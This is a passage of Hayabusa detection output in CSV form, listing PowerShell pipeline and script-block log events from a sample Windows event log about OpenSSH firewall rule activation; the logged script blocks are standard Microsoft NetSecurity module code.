value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.386 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallProfile"" ParameterBinding(Export-ModuleMember): name=""Alias""; 
value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.387 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallProfile"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.418 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecDeltaCollection' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if 
($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.418 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecDeltaCollection' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.419 
+09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.419 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecDoSPSetting' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='cim:CreateInstance0')] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue 
= $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdl",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecDoSPSetting' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] 
${FilteringFlags}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 
'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdl",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"etization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; 